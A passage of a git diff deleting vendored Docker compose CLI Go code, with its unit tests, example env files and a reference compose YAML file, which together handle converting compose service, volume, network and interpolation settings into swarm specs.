append(nets, swarm.NetworkAttachmentConfig{ - Target: target, - Aliases: append(aliases, name), - }) - } - - sort.Sort(byNetworkTarget(nets)) - - return nets, nil -} - -// TODO: fix secrets API so that SecretAPIClient is not required here -func convertServiceSecrets( - client 
client.SecretAPIClient, - namespace Namespace, - secrets []composetypes.ServiceSecretConfig, - secretSpecs map[string]composetypes.SecretConfig, -) ([]*swarm.SecretReference, error) { - opts := []*types.SecretRequestOption{} - for _, secret := range secrets { - target := secret.Target - if target == "" { - target = secret.Source - } - - source := namespace.Scope(secret.Source) - secretSpec := secretSpecs[secret.Source] - if secretSpec.External.External { - source = secretSpec.External.Name - } - - uid := secret.UID - gid := secret.GID - if uid == "" { - uid = "0" - } - if gid == "" { - gid = "0" - } - - opts = append(opts, &types.SecretRequestOption{ - Source: source, - Target: target, - UID: uid, - GID: gid, - Mode: os.FileMode(secret.Mode), - }) - } - - return servicecli.ParseSecrets(client, opts) -} - -func convertExtraHosts(extraHosts map[string]string) []string { - hosts := []string{} - for host, ip := range extraHosts { - hosts = append(hosts, fmt.Sprintf("%s %s", ip, host)) - } - return hosts -} - -func convertHealthcheck(healthcheck *composetypes.HealthCheckConfig) (*container.HealthConfig, error) { - if healthcheck == nil { - return nil, nil - } - var ( - err error - timeout, interval time.Duration - retries int - ) - if healthcheck.Disable { - if len(healthcheck.Test) != 0 { - return nil, fmt.Errorf("test and disable can't be set at the same time") - } - return &container.HealthConfig{ - Test: []string{"NONE"}, - }, nil - - } - if healthcheck.Timeout != "" { - timeout, err = time.ParseDuration(healthcheck.Timeout) - if err != nil { - return nil, err - } - } - if healthcheck.Interval != "" { - interval, err = time.ParseDuration(healthcheck.Interval) - if err != nil { - return nil, err - } - } - if healthcheck.Retries != nil { - retries = int(*healthcheck.Retries) - } - return &container.HealthConfig{ - Test: healthcheck.Test, - Timeout: timeout, - Interval: interval, - Retries: retries, - }, nil -} - -func convertRestartPolicy(restart string, source 
*composetypes.RestartPolicy) (*swarm.RestartPolicy, error) { - // TODO: log if restart is being ignored - if source == nil { - policy, err := runconfigopts.ParseRestartPolicy(restart) - if err != nil { - return nil, err - } - switch { - case policy.IsNone(): - return nil, nil - case policy.IsAlways(), policy.IsUnlessStopped(): - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionAny, - }, nil - case policy.IsOnFailure(): - attempts := uint64(policy.MaximumRetryCount) - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionOnFailure, - MaxAttempts: &attempts, - }, nil - default: - return nil, fmt.Errorf("unknown restart policy: %s", restart) - } - } - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyCondition(source.Condition), - Delay: source.Delay, - MaxAttempts: source.MaxAttempts, - Window: source.Window, - }, nil -} - -func convertUpdateConfig(source *composetypes.UpdateConfig) *swarm.UpdateConfig { - if source == nil { - return nil - } - parallel := uint64(1) - if source.Parallelism != nil { - parallel = *source.Parallelism - } - return &swarm.UpdateConfig{ - Parallelism: parallel, - Delay: source.Delay, - FailureAction: source.FailureAction, - Monitor: source.Monitor, - MaxFailureRatio: source.MaxFailureRatio, - } -} - -func convertResources(source composetypes.Resources) (*swarm.ResourceRequirements, error) { - resources := &swarm.ResourceRequirements{} - var err error - if source.Limits != nil { - var cpus int64 - if source.Limits.NanoCPUs != "" { - cpus, err = opts.ParseCPUs(source.Limits.NanoCPUs) - if err != nil { - return nil, err - } - } - resources.Limits = &swarm.Resources{ - NanoCPUs: cpus, - MemoryBytes: int64(source.Limits.MemoryBytes), - } - } - if source.Reservations != nil { - var cpus int64 - if source.Reservations.NanoCPUs != "" { - cpus, err = opts.ParseCPUs(source.Reservations.NanoCPUs) - if err != nil { - return nil, err - } - } - resources.Reservations = &swarm.Resources{ - NanoCPUs: cpus, - 
MemoryBytes: int64(source.Reservations.MemoryBytes), - } - } - return resources, nil - -} - -type byPublishedPort []swarm.PortConfig - -func (a byPublishedPort) Len() int { return len(a) } -func (a byPublishedPort) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a byPublishedPort) Less(i, j int) bool { return a[i].PublishedPort < a[j].PublishedPort } - -func convertEndpointSpec(source []string) (*swarm.EndpointSpec, error) { - portConfigs := []swarm.PortConfig{} - ports, portBindings, err := nat.ParsePortSpecs(source) - if err != nil { - return nil, err - } - - for port := range ports { - portConfigs = append( - portConfigs, - opts.ConvertPortToPortConfig(port, portBindings)...) - } - - // Sorting to make sure these are always in the same order - sort.Sort(byPublishedPort(portConfigs)) - - return &swarm.EndpointSpec{Ports: portConfigs}, nil -} - -func convertEnvironment(source map[string]string) []string { - var output []string - - for name, value := range source { - output = append(output, fmt.Sprintf("%s=%s", name, value)) - } - - return output -} - -func convertDeployMode(mode string, replicas *uint64) (swarm.ServiceMode, error) { - serviceMode := swarm.ServiceMode{} - - switch mode { - case "global": - if replicas != nil { - return serviceMode, fmt.Errorf("replicas can only be used with replicated mode") - } - serviceMode.Global = &swarm.GlobalService{} - case "replicated", "": - serviceMode.Replicated = &swarm.ReplicatedService{Replicas: replicas} - default: - return serviceMode, fmt.Errorf("Unknown mode: %s", mode) - } - return serviceMode, nil -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go deleted file mode 100644 index 2e614d730c..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go +++ /dev/null @@ -1,216 +0,0 @@ -package convert - -import ( - "sort" - "strings" - "testing" - "time" - - 
"github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/swarm" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestConvertRestartPolicyFromNone(t *testing.T) { - policy, err := convertRestartPolicy("no", nil) - assert.NilError(t, err) - assert.Equal(t, policy, (*swarm.RestartPolicy)(nil)) -} - -func TestConvertRestartPolicyFromUnknown(t *testing.T) { - _, err := convertRestartPolicy("unknown", nil) - assert.Error(t, err, "unknown restart policy: unknown") -} - -func TestConvertRestartPolicyFromAlways(t *testing.T) { - policy, err := convertRestartPolicy("always", nil) - expected := &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionAny, - } - assert.NilError(t, err) - assert.DeepEqual(t, policy, expected) -} - -func TestConvertRestartPolicyFromFailure(t *testing.T) { - policy, err := convertRestartPolicy("on-failure:4", nil) - attempts := uint64(4) - expected := &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyConditionOnFailure, - MaxAttempts: &attempts, - } - assert.NilError(t, err) - assert.DeepEqual(t, policy, expected) -} - -func TestConvertEnvironment(t *testing.T) { - source := map[string]string{ - "foo": "bar", - "key": "value", - } - env := convertEnvironment(source) - sort.Strings(env) - assert.DeepEqual(t, env, []string{"foo=bar", "key=value"}) -} - -func TestConvertResourcesFull(t *testing.T) { - source := composetypes.Resources{ - Limits: &composetypes.Resource{ - NanoCPUs: "0.003", - MemoryBytes: composetypes.UnitBytes(300000000), - }, - Reservations: &composetypes.Resource{ - NanoCPUs: "0.002", - MemoryBytes: composetypes.UnitBytes(200000000), - }, - } - resources, err := convertResources(source) - assert.NilError(t, err) - - expected := &swarm.ResourceRequirements{ - Limits: &swarm.Resources{ - NanoCPUs: 3000000, - MemoryBytes: 300000000, - }, - Reservations: &swarm.Resources{ - NanoCPUs: 2000000, - MemoryBytes: 200000000, - }, - } - 
assert.DeepEqual(t, resources, expected) -} - -func TestConvertResourcesOnlyMemory(t *testing.T) { - source := composetypes.Resources{ - Limits: &composetypes.Resource{ - MemoryBytes: composetypes.UnitBytes(300000000), - }, - Reservations: &composetypes.Resource{ - MemoryBytes: composetypes.UnitBytes(200000000), - }, - } - resources, err := convertResources(source) - assert.NilError(t, err) - - expected := &swarm.ResourceRequirements{ - Limits: &swarm.Resources{ - MemoryBytes: 300000000, - }, - Reservations: &swarm.Resources{ - MemoryBytes: 200000000, - }, - } - assert.DeepEqual(t, resources, expected) -} - -func TestConvertHealthcheck(t *testing.T) { - retries := uint64(10) - source := &composetypes.HealthCheckConfig{ - Test: []string{"EXEC", "touch", "/foo"}, - Timeout: "30s", - Interval: "2ms", - Retries: &retries, - } - expected := &container.HealthConfig{ - Test: source.Test, - Timeout: 30 * time.Second, - Interval: 2 * time.Millisecond, - Retries: 10, - } - - healthcheck, err := convertHealthcheck(source) - assert.NilError(t, err) - assert.DeepEqual(t, healthcheck, expected) -} - -func TestConvertHealthcheckDisable(t *testing.T) { - source := &composetypes.HealthCheckConfig{Disable: true} - expected := &container.HealthConfig{ - Test: []string{"NONE"}, - } - - healthcheck, err := convertHealthcheck(source) - assert.NilError(t, err) - assert.DeepEqual(t, healthcheck, expected) -} - -func TestConvertHealthcheckDisableWithTest(t *testing.T) { - source := &composetypes.HealthCheckConfig{ - Disable: true, - Test: []string{"EXEC", "touch"}, - } - _, err := convertHealthcheck(source) - assert.Error(t, err, "test and disable can't be set") -} - -func TestConvertServiceNetworksOnlyDefault(t *testing.T) { - networkConfigs := networkMap{} - networks := map[string]*composetypes.ServiceNetworkConfig{} - - configs, err := convertServiceNetworks( - networks, networkConfigs, NewNamespace("foo"), "service") - - expected := []swarm.NetworkAttachmentConfig{ - { - Target: 
"foo_default", - Aliases: []string{"service"}, - }, - } - - assert.NilError(t, err) - assert.DeepEqual(t, configs, expected) -} - -func TestConvertServiceNetworks(t *testing.T) { - networkConfigs := networkMap{ - "front": composetypes.NetworkConfig{ - External: composetypes.External{ - External: true, - Name: "fronttier", - }, - }, - "back": composetypes.NetworkConfig{}, - } - networks := map[string]*composetypes.ServiceNetworkConfig{ - "front": { - Aliases: []string{"something"}, - }, - "back": { - Aliases: []string{"other"}, - }, - } - - configs, err := convertServiceNetworks( - networks, networkConfigs, NewNamespace("foo"), "service") - - expected := []swarm.NetworkAttachmentConfig{ - { - Target: "foo_back", - Aliases: []string{"other", "service"}, - }, - { - Target: "fronttier", - Aliases: []string{"something", "service"}, - }, - } - - sortedConfigs := byTargetSort(configs) - sort.Sort(&sortedConfigs) - - assert.NilError(t, err) - assert.DeepEqual(t, []swarm.NetworkAttachmentConfig(sortedConfigs), expected) -} - -type byTargetSort []swarm.NetworkAttachmentConfig - -func (s byTargetSort) Len() int { - return len(s) -} - -func (s byTargetSort) Less(i, j int) bool { - return strings.Compare(s[i].Target, s[j].Target) < 0 -} - -func (s byTargetSort) Swap(i, j int) { - s[i], s[j] = s[j], s[i] -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume.go b/vendor/github.com/docker/docker/cli/compose/convert/volume.go deleted file mode 100644 index 24442d4dc7..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/volume.go +++ /dev/null @@ -1,128 +0,0 @@ -package convert - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types/mount" - composetypes "github.com/docker/docker/cli/compose/types" -) - -type volumes map[string]composetypes.VolumeConfig - -// Volumes from compose-file types to engine api types -func Volumes(serviceVolumes []string, stackVolumes volumes, namespace Namespace) ([]mount.Mount, error) { - var mounts 
[]mount.Mount - - for _, volumeSpec := range serviceVolumes { - mount, err := convertVolumeToMount(volumeSpec, stackVolumes, namespace) - if err != nil { - return nil, err - } - mounts = append(mounts, mount) - } - return mounts, nil -} - -func convertVolumeToMount(volumeSpec string, stackVolumes volumes, namespace Namespace) (mount.Mount, error) { - var source, target string - var mode []string - - // TODO: split Windows path mappings properly - parts := strings.SplitN(volumeSpec, ":", 3) - - for _, part := range parts { - if strings.TrimSpace(part) == "" { - return mount.Mount{}, fmt.Errorf("invalid volume: %s", volumeSpec) - } - } - - switch len(parts) { - case 3: - source = parts[0] - target = parts[1] - mode = strings.Split(parts[2], ",") - case 2: - source = parts[0] - target = parts[1] - case 1: - target = parts[0] - } - - if source == "" { - // Anonymous volume - return mount.Mount{ - Type: mount.TypeVolume, - Target: target, - }, nil - } - - // TODO: catch Windows paths here - if strings.HasPrefix(source, "/") { - return mount.Mount{ - Type: mount.TypeBind, - Source: source, - Target: target, - ReadOnly: isReadOnly(mode), - BindOptions: getBindOptions(mode), - }, nil - } - - stackVolume, exists := stackVolumes[source] - if !exists { - return mount.Mount{}, fmt.Errorf("undefined volume: %s", source) - } - - var volumeOptions *mount.VolumeOptions - if stackVolume.External.Name != "" { - source = stackVolume.External.Name - } else { - volumeOptions = &mount.VolumeOptions{ - Labels: AddStackLabel(namespace, stackVolume.Labels), - NoCopy: isNoCopy(mode), - } - - if stackVolume.Driver != "" { - volumeOptions.DriverConfig = &mount.Driver{ - Name: stackVolume.Driver, - Options: stackVolume.DriverOpts, - } - } - source = namespace.Scope(source) - } - return mount.Mount{ - Type: mount.TypeVolume, - Source: source, - Target: target, - ReadOnly: isReadOnly(mode), - VolumeOptions: volumeOptions, - }, nil -} - -func modeHas(mode []string, field string) bool { - for _, 
item := range mode { - if item == field { - return true - } - } - return false -} - -func isReadOnly(mode []string) bool { - return modeHas(mode, "ro") -} - -func isNoCopy(mode []string) bool { - return modeHas(mode, "nocopy") -} - -func getBindOptions(mode []string) *mount.BindOptions { - for _, item := range mode { - for _, propagation := range mount.Propagations { - if mount.Propagation(item) == propagation { - return &mount.BindOptions{Propagation: mount.Propagation(item)} - } - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go deleted file mode 100644 index 113ab1e1b6..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go +++ /dev/null @@ -1,133 +0,0 @@ -package convert - -import ( - "testing" - - "github.com/docker/docker/api/types/mount" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestIsReadOnly(t *testing.T) { - assert.Equal(t, isReadOnly([]string{"foo", "bar", "ro"}), true) - assert.Equal(t, isReadOnly([]string{"ro"}), true) - assert.Equal(t, isReadOnly([]string{}), false) - assert.Equal(t, isReadOnly([]string{"foo", "rw"}), false) - assert.Equal(t, isReadOnly([]string{"foo"}), false) -} - -func TestIsNoCopy(t *testing.T) { - assert.Equal(t, isNoCopy([]string{"foo", "bar", "nocopy"}), true) - assert.Equal(t, isNoCopy([]string{"nocopy"}), true) - assert.Equal(t, isNoCopy([]string{}), false) - assert.Equal(t, isNoCopy([]string{"foo", "rw"}), false) -} - -func TestGetBindOptions(t *testing.T) { - opts := getBindOptions([]string{"slave"}) - expected := mount.BindOptions{Propagation: mount.PropagationSlave} - assert.Equal(t, *opts, expected) -} - -func TestGetBindOptionsNone(t *testing.T) { - opts := getBindOptions([]string{"ro"}) - assert.Equal(t, opts, (*mount.BindOptions)(nil)) -} - -func TestConvertVolumeToMountNamedVolume(t 
*testing.T) { - stackVolumes := volumes{ - "normal": composetypes.VolumeConfig{ - Driver: "glusterfs", - DriverOpts: map[string]string{ - "opt": "value", - }, - Labels: map[string]string{ - "something": "labeled", - }, - }, - } - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeVolume, - Source: "foo_normal", - Target: "/foo", - ReadOnly: true, - VolumeOptions: &mount.VolumeOptions{ - Labels: map[string]string{ - LabelNamespace: "foo", - "something": "labeled", - }, - DriverConfig: &mount.Driver{ - Name: "glusterfs", - Options: map[string]string{ - "opt": "value", - }, - }, - }, - } - mount, err := convertVolumeToMount("normal:/foo:ro", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mount, expected) -} - -func TestConvertVolumeToMountNamedVolumeExternal(t *testing.T) { - stackVolumes := volumes{ - "outside": composetypes.VolumeConfig{ - External: composetypes.External{ - External: true, - Name: "special", - }, - }, - } - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeVolume, - Source: "special", - Target: "/foo", - } - mount, err := convertVolumeToMount("outside:/foo", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mount, expected) -} - -func TestConvertVolumeToMountBind(t *testing.T) { - stackVolumes := volumes{} - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeBind, - Source: "/bar", - Target: "/foo", - ReadOnly: true, - BindOptions: &mount.BindOptions{Propagation: mount.PropagationShared}, - } - mount, err := convertVolumeToMount("/bar:/foo:ro,shared", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mount, expected) -} - -func TestConvertVolumeToMountVolumeDoesNotExist(t *testing.T) { - namespace := NewNamespace("foo") - _, err := convertVolumeToMount("unknown:/foo:ro", volumes{}, namespace) - assert.Error(t, err, "undefined volume: unknown") -} - -func TestConvertVolumeToMountAnonymousVolume(t 
*testing.T) { - stackVolumes := map[string]composetypes.VolumeConfig{} - namespace := NewNamespace("foo") - expected := mount.Mount{ - Type: mount.TypeVolume, - Target: "/foo/bar", - } - mnt, err := convertVolumeToMount("/foo/bar", stackVolumes, namespace) - assert.NilError(t, err) - assert.DeepEqual(t, mnt, expected) -} - -func TestConvertVolumeToMountInvalidFormat(t *testing.T) { - namespace := NewNamespace("foo") - invalids := []string{"::", "::cc", ":bb:", "aa::", "aa::cc", "aa:bb:", " : : ", " : :cc", " :bb: ", "aa: : ", "aa: :cc", "aa:bb: "} - for _, vol := range invalids { - _, err := convertVolumeToMount(vol, map[string]composetypes.VolumeConfig{}, namespace) - assert.Error(t, err, "invalid volume: "+vol) - } -} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go deleted file mode 100644 index 734f28ec9d..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go +++ /dev/null @@ -1,90 +0,0 @@ -package interpolation - -import ( - "fmt" - - "github.com/docker/docker/cli/compose/template" - "github.com/docker/docker/cli/compose/types" -) - -// Interpolate replaces variables in a string with the values from a mapping -func Interpolate(config types.Dict, section string, mapping template.Mapping) (types.Dict, error) { - out := types.Dict{} - - for name, item := range config { - if item == nil { - out[name] = nil - continue - } - interpolatedItem, err := interpolateSectionItem(name, item.(types.Dict), section, mapping) - if err != nil { - return nil, err - } - out[name] = interpolatedItem - } - - return out, nil -} - -func interpolateSectionItem( - name string, - item types.Dict, - section string, - mapping template.Mapping, -) (types.Dict, error) { - - out := types.Dict{} - - for key, value := range item { - interpolatedValue, err := recursiveInterpolate(value, mapping) - if err != nil { - return nil, fmt.Errorf( - 
"Invalid interpolation format for %#v option in %s %#v: %#v", - key, section, name, err.Template, - ) - } - out[key] = interpolatedValue - } - - return out, nil - -} - -func recursiveInterpolate( - value interface{}, - mapping template.Mapping, -) (interface{}, *template.InvalidTemplateError) { - - switch value := value.(type) { - - case string: - return template.Substitute(value, mapping) - - case types.Dict: - out := types.Dict{} - for key, elem := range value { - interpolatedElem, err := recursiveInterpolate(elem, mapping) - if err != nil { - return nil, err - } - out[key] = interpolatedElem - } - return out, nil - - case []interface{}: - out := make([]interface{}, len(value)) - for i, elem := range value { - interpolatedElem, err := recursiveInterpolate(elem, mapping) - if err != nil { - return nil, err - } - out[i] = interpolatedElem - } - return out, nil - - default: - return value, nil - - } - -} diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go deleted file mode 100644 index c3921701b3..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go +++ /dev/null @@ -1,59 +0,0 @@ -package interpolation - -import ( - "testing" - - "github.com/stretchr/testify/assert" - - "github.com/docker/docker/cli/compose/types" -) - -var defaults = map[string]string{ - "USER": "jenny", - "FOO": "bar", -} - -func defaultMapping(name string) (string, bool) { - val, ok := defaults[name] - return val, ok -} - -func TestInterpolate(t *testing.T) { - services := types.Dict{ - "servicea": types.Dict{ - "image": "example:${USER}", - "volumes": []interface{}{"$FOO:/target"}, - "logging": types.Dict{ - "driver": "${FOO}", - "options": types.Dict{ - "user": "$USER", - }, - }, - }, - } - expected := types.Dict{ - "servicea": types.Dict{ - "image": "example:jenny", - "volumes": []interface{}{"bar:/target"}, - "logging": 
types.Dict{ - "driver": "bar", - "options": types.Dict{ - "user": "jenny", - }, - }, - }, - } - result, err := Interpolate(services, "service", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, expected, result) -} - -func TestInvalidInterpolation(t *testing.T) { - services := types.Dict{ - "servicea": types.Dict{ - "image": "${", - }, - } - _, err := Interpolate(services, "service", defaultMapping) - assert.EqualError(t, err, `Invalid interpolation format for "image" option in service "servicea": "${"`) -} diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example1.env b/vendor/github.com/docker/docker/cli/compose/loader/example1.env deleted file mode 100644 index 3e7a059613..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/example1.env +++ /dev/null @@ -1,8 +0,0 @@ -# passed through -FOO=1 - -# overridden in example2.env -BAR=1 - -# overridden in full-example.yml -BAZ=1 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example2.env b/vendor/github.com/docker/docker/cli/compose/loader/example2.env deleted file mode 100644 index 0920d5ab05..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/example2.env +++ /dev/null @@ -1 +0,0 @@ -BAR=2 diff --git a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml deleted file mode 100644 index fb5686a380..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml +++ /dev/null @@ -1,287 +0,0 @@ -version: "3" - -services: - foo: - cap_add: - - ALL - - cap_drop: - - NET_ADMIN - - SYS_ADMIN - - cgroup_parent: m-executor-abcd - - # String or list - command: bundle exec thin -p 3000 - # command: ["bundle", "exec", "thin", "-p", "3000"] - - container_name: my-web-container - - depends_on: - - db - - redis - - deploy: - mode: replicated - replicas: 6 - labels: [FOO=BAR] - update_config: - parallelism: 3 - delay: 10s - failure_action: continue - monitor: 
60s - max_failure_ratio: 0.3 - resources: - limits: - cpus: '0.001' - memory: 50M - reservations: - cpus: '0.0001' - memory: 20M - restart_policy: - condition: on_failure - delay: 5s - max_attempts: 3 - window: 120s - placement: - constraints: [node=foo] - - devices: - - "/dev/ttyUSB0:/dev/ttyUSB0" - - # String or list - # dns: 8.8.8.8 - dns: - - 8.8.8.8 - - 9.9.9.9 - - # String or list - # dns_search: example.com - dns_search: - - dc1.example.com - - dc2.example.com - - domainname: foo.com - - # String or list - # entrypoint: /code/entrypoint.sh -p 3000 - entrypoint: ["/code/entrypoint.sh", "-p", "3000"] - - # String or list - # env_file: .env - env_file: - - ./example1.env - - ./example2.env - - # Mapping or list - # Mapping values can be strings, numbers or null - # Booleans are not allowed - must be quoted - environment: - RACK_ENV: development - SHOW: 'true' - SESSION_SECRET: - BAZ: 3 - # environment: - # - RACK_ENV=development - # - SHOW=true - # - SESSION_SECRET - - # Items can be strings or numbers - expose: - - "3000" - - 8000 - - external_links: - - redis_1 - - project_db_1:mysql - - project_db_1:postgresql - - # Mapping or list - # Mapping values must be strings - # extra_hosts: - # somehost: "162.242.195.82" - # otherhost: "50.31.209.229" - extra_hosts: - - "somehost:162.242.195.82" - - "otherhost:50.31.209.229" - - hostname: foo - - healthcheck: - test: echo "hello world" - interval: 10s - timeout: 1s - retries: 5 - - # Any valid image reference - repo, tag, id, sha - image: redis - # image: ubuntu:14.04 - # image: tutum/influxdb - # image: example-registry.com:4000/postgresql - # image: a4bc65fd - # image: busybox@sha256:38a203e1986cf79639cfb9b2e1d6e773de84002feea2d4eb006b52004ee8502d - - ipc: host - - # Mapping or list - # Mapping values can be strings, numbers or null - labels: - com.example.description: "Accounting webapp" - com.example.number: 42 - com.example.empty-label: - # labels: - # - "com.example.description=Accounting webapp" - # - 
"com.example.number=42" - # - "com.example.empty-label" - - links: - - db - - db:database - - redis - - logging: - driver: syslog - options: - syslog-address: "tcp://192.168.0.42:123" - - mac_address: 02:42:ac:11:65:43 - - # network_mode: "bridge" - # network_mode: "host" - # network_mode: "none" - # Use the network mode of an arbitrary container from another service - # network_mode: "service:db" - # Use the network mode of another container, specified by name or id - # network_mode: "container:some-container" - network_mode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b" - - networks: - some-network: - aliases: - - alias1 - - alias3 - other-network: - ipv4_address: 172.16.238.10 - ipv6_address: 2001:3984:3989::10 - other-other-network: - - pid: "host" - - ports: - - 3000 - - "3000-3005" - - "8000:8000" - - "9090-9091:8080-8081" - - "49100:22" - - "127.0.0.1:8001:8001" - - "127.0.0.1:5000-5010:5000-5010" - - privileged: true - - read_only: true - - restart: always - - security_opt: - - label=level:s0:c100,c200 - - label=type:svirt_apache_t - - stdin_open: true - - stop_grace_period: 20s - - stop_signal: SIGUSR1 - - # String or list - # tmpfs: /run - tmpfs: - - /run - - /tmp - - tty: true - - ulimits: - # Single number or mapping with soft + hard limits - nproc: 65535 - nofile: - soft: 20000 - hard: 40000 - - user: someone - - volumes: - # Just specify a path and let the Engine create a volume - - /var/lib/mysql - # Specify an absolute path mapping - - /opt/data:/var/lib/mysql - # Path on the host, relative to the Compose file - - .:/code - - ./static:/var/www/html - # User-relative path - - ~/configs:/etc/configs/:ro - # Named volume - - datavolume:/var/lib/mysql - - working_dir: /code - -networks: - # Entries can be null, which specifies simply that a network - # called "{project name}_some-network" should be created and - # use the default driver - some-network: - - other-network: - driver: overlay - - driver_opts: - # Values can be 
strings or numbers - foo: "bar" - baz: 1 - - ipam: - driver: overlay - # driver_opts: - # # Values can be strings or numbers - # com.docker.network.enable_ipv6: "true" - # com.docker.network.numeric_value: 1 - config: - - subnet: 172.16.238.0/24 - # gateway: 172.16.238.1 - - subnet: 2001:3984:3989::/64 - # gateway: 2001:3984:3989::1 - - external-network: - # Specifies that a pre-existing network called "external-network" - # can be referred to within this file as "external-network" - external: true - - other-external-network: - # Specifies that a pre-existing network called "my-cool-network" - # can be referred to within this file as "other-external-network" - external: - name: my-cool-network - -volumes: - # Entries can be null, which specifies simply that a volume - # called "{project name}_some-volume" should be created and - # use the default driver - some-volume: - - other-volume: - driver: flocker - - driver_opts: - # Values can be strings or numbers - foo: "bar" - baz: 1 - - external-volume: - # Specifies that a pre-existing volume called "external-volume" - # can be referred to within this file as "external-volume" - external: true - - other-external-volume: - # Specifies that a pre-existing volume called "my-cool-volume" - # can be referred to within this file as "other-external-volume" - external: - name: my-cool-volume diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader.go b/vendor/github.com/docker/docker/cli/compose/loader/loader.go deleted file mode 100644 index 39f69a03ff..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/loader.go +++ /dev/null @@ -1,653 +0,0 @@ -package loader - -import ( - "fmt" - "os" - "path" - "reflect" - "regexp" - "sort" - "strings" - - "github.com/docker/docker/cli/compose/interpolation" - "github.com/docker/docker/cli/compose/schema" - "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/runconfig/opts" - units "github.com/docker/go-units" - shellwords 
"github.com/mattn/go-shellwords" - "github.com/mitchellh/mapstructure" - yaml "gopkg.in/yaml.v2" -) - -var ( - fieldNameRegexp = regexp.MustCompile("[A-Z][a-z0-9]+") -) - -// ParseYAML reads the bytes from a file, parses the bytes into a mapping -// structure, and returns it. -func ParseYAML(source []byte) (types.Dict, error) { - var cfg interface{} - if err := yaml.Unmarshal(source, &cfg); err != nil { - return nil, err - } - cfgMap, ok := cfg.(map[interface{}]interface{}) - if !ok { - return nil, fmt.Errorf("Top-level object must be a mapping") - } - converted, err := convertToStringKeysRecursive(cfgMap, "") - if err != nil { - return nil, err - } - return converted.(types.Dict), nil -} - -// Load reads a ConfigDetails and returns a fully loaded configuration -func Load(configDetails types.ConfigDetails) (*types.Config, error) { - if len(configDetails.ConfigFiles) < 1 { - return nil, fmt.Errorf("No files specified") - } - if len(configDetails.ConfigFiles) > 1 { - return nil, fmt.Errorf("Multiple files are not yet supported") - } - - configDict := getConfigDict(configDetails) - - if services, ok := configDict["services"]; ok { - if servicesDict, ok := services.(types.Dict); ok { - forbidden := getProperties(servicesDict, types.ForbiddenProperties) - - if len(forbidden) > 0 { - return nil, &ForbiddenPropertiesError{Properties: forbidden} - } - } - } - - if err := schema.Validate(configDict, schema.Version(configDict)); err != nil { - return nil, err - } - - cfg := types.Config{} - if services, ok := configDict["services"]; ok { - servicesConfig, err := interpolation.Interpolate(services.(types.Dict), "service", os.LookupEnv) - if err != nil { - return nil, err - } - - servicesList, err := loadServices(servicesConfig, configDetails.WorkingDir) - if err != nil { - return nil, err - } - - cfg.Services = servicesList - } - - if networks, ok := configDict["networks"]; ok { - networksConfig, err := interpolation.Interpolate(networks.(types.Dict), "network", os.LookupEnv) 
- if err != nil { - return nil, err - } - - networksMapping, err := loadNetworks(networksConfig) - if err != nil { - return nil, err - } - - cfg.Networks = networksMapping - } - - if volumes, ok := configDict["volumes"]; ok { - volumesConfig, err := interpolation.Interpolate(volumes.(types.Dict), "volume", os.LookupEnv) - if err != nil { - return nil, err - } - - volumesMapping, err := loadVolumes(volumesConfig) - if err != nil { - return nil, err - } - - cfg.Volumes = volumesMapping - } - - if secrets, ok := configDict["secrets"]; ok { - secretsConfig, err := interpolation.Interpolate(secrets.(types.Dict), "secret", os.LookupEnv) - if err != nil { - return nil, err - } - - secretsMapping, err := loadSecrets(secretsConfig, configDetails.WorkingDir) - if err != nil { - return nil, err - } - - cfg.Secrets = secretsMapping - } - - return &cfg, nil -} - -// GetUnsupportedProperties returns the list of any unsupported properties that are -// used in the Compose files. -func GetUnsupportedProperties(configDetails types.ConfigDetails) []string { - unsupported := map[string]bool{} - - for _, service := range getServices(getConfigDict(configDetails)) { - serviceDict := service.(types.Dict) - for _, property := range types.UnsupportedProperties { - if _, isSet := serviceDict[property]; isSet { - unsupported[property] = true - } - } - } - - return sortedKeys(unsupported) -} - -func sortedKeys(set map[string]bool) []string { - var keys []string - 